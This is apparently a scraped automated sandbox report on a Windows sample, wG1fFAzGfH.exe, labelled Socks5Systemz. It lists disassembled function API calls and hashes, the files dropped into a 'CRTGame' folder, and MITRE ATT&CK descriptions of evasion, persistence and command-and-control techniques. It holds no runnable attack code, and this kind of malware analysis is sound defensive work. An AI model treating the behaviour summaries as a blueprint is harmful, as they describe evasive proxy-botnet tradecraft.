Instruction Fuzzy Hash: D3F03C72640215AFDB009FA5E884B9ABBACFF85710F008559FA08D6141D771EAA4CFA1

Function 02C32004 Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C32009
RtlDeleteCriticalSection.NTDLL(?), ref: 02C32028
CloseHandle.KERNEL32(00000000), ref: 02C32037
CloseHandle.KERNEL32(00000000), ref: 02C3204E

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CloseHandle$CriticalDeleteH_prologSection
String ID:
API String ID: 2456309408-0
Opcode ID: c6f83bfbfd32f1c55660bb113ccf6f2223e1b015c34774d4646818bf30354a6f
Instruction ID: dd4e33f8f171c3065550efe2267fa1a72d8586fdeb0b6a10dd0218836402d6b3
Opcode Fuzzy Hash: c6f83bfbfd32f1c55660bb113ccf6f2223e1b015c34774d4646818bf30354a6f
Instruction Fuzzy Hash: 82016DB14007149BC726AF54E908B9AF7F5EF44709F004E1DE94692590CB74AA8CDF95

Function 02C31E26 Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C31E2B
SetEvent.KERNEL32(00000000), ref: 02C31E3F
SetEvent.KERNEL32(?), ref: 02C31E58
SleepEx.KERNEL32(000000FF,00000001), ref: 02C31E62

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: Event$H_prologSleep
String ID:
API String ID: 1765829285-0
Opcode ID: 3828b7f67b15696c8cee834d4b415dec834e723332d14aeb22b4924cc56ebbc7
Instruction ID: 7badd0e7964967b2ced3ad5814c2c800fa8ff834933f15cc0a0d05014e1f9639
Opcode Fuzzy Hash: 3828b7f67b15696c8cee834d4b415dec834e723332d14aeb22b4924cc56ebbc7
Instruction Fuzzy Hash: 78F03075640120DFCB009F94D888B89BBA5FF4D311F0082A9FA199B290C7759894CB95

Function 02C39008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02C37D72,?,?,00000000), ref: 02C3906F
getsockname.WS2_32(?,?,?), ref: 02C39085

Strings

&', xrefs: 02C390B8

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: ErrorLastgetsockname
String ID: &'
API String ID: 566540725-655172784
Opcode ID: 2350d69c1dfbacd6ba034a2c537f09cd808bfc59bd14747959b6b1413c84e3da
Instruction ID: 1efc319dcb097bacec166d5e295e82aa71aa56dba1ec11b661c98bfb84a1a4c3
Opcode Fuzzy Hash: 2350d69c1dfbacd6ba034a2c537f09cd808bfc59bd14747959b6b1413c84e3da
Instruction Fuzzy Hash: A5215172A00208DBDB10DF68D844ACEB7F5FF4C314F10856AE918EB280EB70E9458B94

Function 02C35278 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 02C35288

Part of subcall function 02C429CC: __FF_MSGBANNER.LIBCMT ref: 02C429E3
Part of subcall function 02C429CC: __NMSG_WRITE.LIBCMT ref: 02C429EA
Part of subcall function 02C429CC: RtlAllocateHeap.NTDLL(006C0000,00000000,00000001), ref: 02C42A0F

SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00002000,00000000,00000001,00000000,00000000,?,02C375C8), ref: 02C3529A

Strings

\save.dat, xrefs: 02C352AE

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: AllocateFolderHeapPathSpecial_malloc
String ID: \save.dat
API String ID: 4128168839-3580179773
Opcode ID: 1804cc43c23e57a7837a341b7e2d6d138f0259b8d87aaf1b1ae9cac539510e3e
Instruction ID: b7f440bad608f33f6ef73de3c57df9b3ed6d1a85e902ed5c321777ef032452eb
Opcode Fuzzy Hash: 1804cc43c23e57a7837a341b7e2d6d138f0259b8d87aaf1b1ae9cac539510e3e
Instruction Fuzzy Hash: E911943290435527D7129E75CC80D6FBF67EFC566475005ECEC4567101DA631E02C5E0

Function 02C33965 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C3396A
std::runtime_error::runtime_error.LIBCPMT ref: 02C339C1

Part of subcall function 02C31410: std::exception::exception.LIBCMT ref: 02C31428

Part of subcall function 02C39FBD: __EH_prolog.LIBCMT ref: 02C39FC2
Part of subcall function 02C39FBD: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C39FD1
Part of subcall function 02C39FBD: __CxxThrowException@8.LIBCMT ref: 02C39FF0

Strings

Day of month is not valid for year, xrefs: 02C339AC

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
String ID: Day of month is not valid for year
API String ID: 1404951899-1521898139
Opcode ID: 36c43764cd1b8d834b71d9f90894fadbce3ee8e84ffd1f2d62a711de63a40568
Instruction ID: b96ad4c821cef1ea3d3ab7af1df6ddae560f30b7f5bd135cec1a69e7eecce3f0
Opcode Fuzzy Hash: 36c43764cd1b8d834b71d9f90894fadbce3ee8e84ffd1f2d62a711de63a40568
Instruction Fuzzy Hash: 5401B176914249EACB05EFA4D841AEEB779FF18710F00441AEC00A3310EB708A85DB99

Function 02C3AA9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 02C3F523
__CxxThrowException@8.LIBCMT ref: 02C3F538

Part of subcall function 02C4356D: _malloc.LIBCMT ref: 02C43585

Strings

bad allocation, xrefs: 02C3F518

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: bad allocation
API String ID: 4063778783-2104205924
Opcode ID: 15494f3832faecad66fc73c1b70e3939aba9853e83e635ca56408f2d66c08f33
Instruction ID: 6d7673f3edb9238dfe94a9a0a166549e197e635727b1411799a4636a1d8f60de
Opcode Fuzzy Hash: 15494f3832faecad66fc73c1b70e3939aba9853e83e635ca56408f2d66c08f33
Instruction Fuzzy Hash: A7F02EB164030966EF04F6A88D149AF73EC9B40710B500DA5E411D31C0EF71E7448994

Function 02C33C16 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C33C1B
std::bad_exception::bad_exception.LIBCMT ref: 02C33C30

Part of subcall function 02C41ED7: std::exception::exception.LIBCMT ref: 02C41EE1

Part of subcall function 02C39FF6: __EH_prolog.LIBCMT ref: 02C39FFB
Part of subcall function 02C39FF6: __CxxThrowException@8.LIBCMT ref: 02C3A024

Strings

bad cast, xrefs: 02C33C28

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
String ID: bad cast
API String ID: 1300498068-3145022300
Opcode ID: 9ebccc737882fa2d82a352d9adcb21a008816210f0411330b53316a09fbe5255
Instruction ID: 08f5b32f01a21d3297e966fd733e26c8418322ced835a9a7ce22aa355e1f4f7e
Opcode Fuzzy Hash: 9ebccc737882fa2d82a352d9adcb21a008816210f0411330b53316a09fbe5255
Instruction Fuzzy Hash: F2F0A0729005488BCB1AEF58D440AEBB776EF56315F1041AEED069B240CBB29A86DAD1

Function 02C338CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C338D2
std::runtime_error::runtime_error.LIBCPMT ref: 02C338F1

Part of subcall function 02C31410: std::exception::exception.LIBCMT ref: 02C31428

Strings

Year is out of valid range: 1400..10000, xrefs: 02C338E0

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
String ID: Year is out of valid range: 1400..10000
API String ID: 2067857976-2344417016
Opcode ID: c1da0b4f01e224992ab2a66ddbf7c1cde9a94ddc65b22878471b0db280bce6ce
Instruction ID: 1b3dbbb1b6298e5e3cf6307e2522530debb3943ca211fbefdb284ba0f52984d6
Opcode Fuzzy Hash: c1da0b4f01e224992ab2a66ddbf7c1cde9a94ddc65b22878471b0db280bce6ce
Instruction Fuzzy Hash: 2AE0D872E042249BDB19FB98DC51BDEB779DB48720F00055AEC0667280DEB159C4DBD5

Function 02C33881 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C33886
std::runtime_error::runtime_error.LIBCPMT ref: 02C338A5

Part of subcall function 02C31410: std::exception::exception.LIBCMT ref: 02C31428

Strings

Day of month value is out of range 1..31, xrefs: 02C33894

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
String ID: Day of month value is out of range 1..31
API String ID: 2067857976-1361117730
Opcode ID: 911055234cee1d2d80c06e722155d62f975c199a3a4b23ece6bb851e63b5bc77
Instruction ID: d234a153cd281376deeb6e65d0947b162cd4b6c2dd027b8bf0e2692dd82c37fd
Opcode Fuzzy Hash: 911055234cee1d2d80c06e722155d62f975c199a3a4b23ece6bb851e63b5bc77
Instruction Fuzzy Hash: 78E0D872E002249BD715BB94DC51BDDB779DB48720F40095AEC0673280DEB159C4DBD9

Function 02C33919 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C3391E
std::runtime_error::runtime_error.LIBCPMT ref: 02C3393D

Part of subcall function 02C31410: std::exception::exception.LIBCMT ref: 02C31428

Strings

Month number is out of range 1..12, xrefs: 02C3392C

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
String ID: Month number is out of range 1..12
API String ID: 2067857976-4198407886
Opcode ID: 1e6a8e057a57ce04b7bd88d18da0bc309b9412c878b1bd4c6fb7b90ea06b1421
Instruction ID: f9e5786aeb410c921ffde5b2116f14f95993cd4000bf0f6a11c1fb5c87865999
Opcode Fuzzy Hash: 1e6a8e057a57ce04b7bd88d18da0bc309b9412c878b1bd4c6fb7b90ea06b1421
Instruction Fuzzy Hash: E4E0D872E442249BD715BB94CC51BDEB779EB48720F00455AEC0663280DEB159C4DBD5

Function 02C319C2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 02C319CC
GetLastError.KERNEL32 ref: 02C319D9

Part of subcall function 02C31712: __EH_prolog.LIBCMT ref: 02C31717

Strings

tss, xrefs: 02C319E8

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: AllocErrorH_prologLast
String ID: tss
API String ID: 249634027-1638339373
Opcode ID: 0fa398ab0a2481d795343f06a35db84daebbf8a5ab6ee2d0721bf7350278c06d
Instruction ID: 7dc4f44a4ab2f578ddbbfefc7322d3f6d7b65f6990f79b9e60c8ee1abf182e28
Opcode Fuzzy Hash: 0fa398ab0a2481d795343f06a35db84daebbf8a5ab6ee2d0721bf7350278c06d
Instruction Fuzzy Hash: 08E08632D143245BC2007B78A80808BBBD4DA85235F144B6AEDAD932D0EB31C9949BC6

Function 02C33BD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C33BD8
std::bad_exception::bad_exception.LIBCMT ref: 02C33BED

Part of subcall function 02C41ED7: std::exception::exception.LIBCMT ref: 02C41EE1

Part of subcall function 02C39FF6: __EH_prolog.LIBCMT ref: 02C39FFB
Part of subcall function 02C39FF6: __CxxThrowException@8.LIBCMT ref: 02C3A024

Strings

bad cast, xrefs: 02C33BE5

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
String ID: bad cast
API String ID: 1300498068-3145022300
Opcode ID: c85e896a4dce70fe179ac0244327f8c3dc1469a5928780461f4f4b845171fe0a
Instruction ID: da964f0b147cabf4c1a680fd235ff686df06d42429ca5524e31c5fdfe38266d5
Opcode Fuzzy Hash: c85e896a4dce70fe179ac0244327f8c3dc1469a5928780461f4f4b845171fe0a
Instruction Fuzzy Hash: 9EE0DF70900189DBC719EF54D541BADB771EF14304F0080ACED0743390CF718A86DE86

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report wG1fFAzGfH.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Socks5Systemz

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)

C:\Program Files (x86)\CRTGame\bin\x86\COPYING.LGPLv2.1 (copy)

C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)

Windows Analysis Report
wG1fFAzGfH.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre